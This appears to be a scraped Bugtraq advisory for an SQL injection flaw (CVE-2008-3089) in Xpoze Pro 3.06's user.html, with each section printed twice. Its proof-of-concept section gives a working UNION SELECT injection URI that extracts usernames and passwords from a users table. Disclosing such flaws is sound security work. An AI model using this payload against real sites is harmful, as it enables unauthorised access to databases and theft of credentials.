Xpoze 'user.html' SQL Injection Vulnerability
BID:30101
Info
Xpoze 'user.html' SQL Injection Vulnerability
| Bugtraq ID: | 30101 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3089 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 06 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | HIva Team |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Xpoze 'user.html' SQL Injection Vulnerability
Xpoze is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects Xpoze Pro 3.06; other versions may also be vulnerable.
Xpoze is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects Xpoze Pro 3.06; other versions may also be vulnerable.
Exploit / POC
Xpoze 'user.html' SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
Solution / Fix
Xpoze 'user.html' SQL Injection Vulnerability
Solution:
Vendor updates are available. Please contact the vendor for more information.
Solution:
Vendor updates are available. Please contact the vendor for more information.
References
Xpoze 'user.html' SQL Injection Vulnerability
References:
References: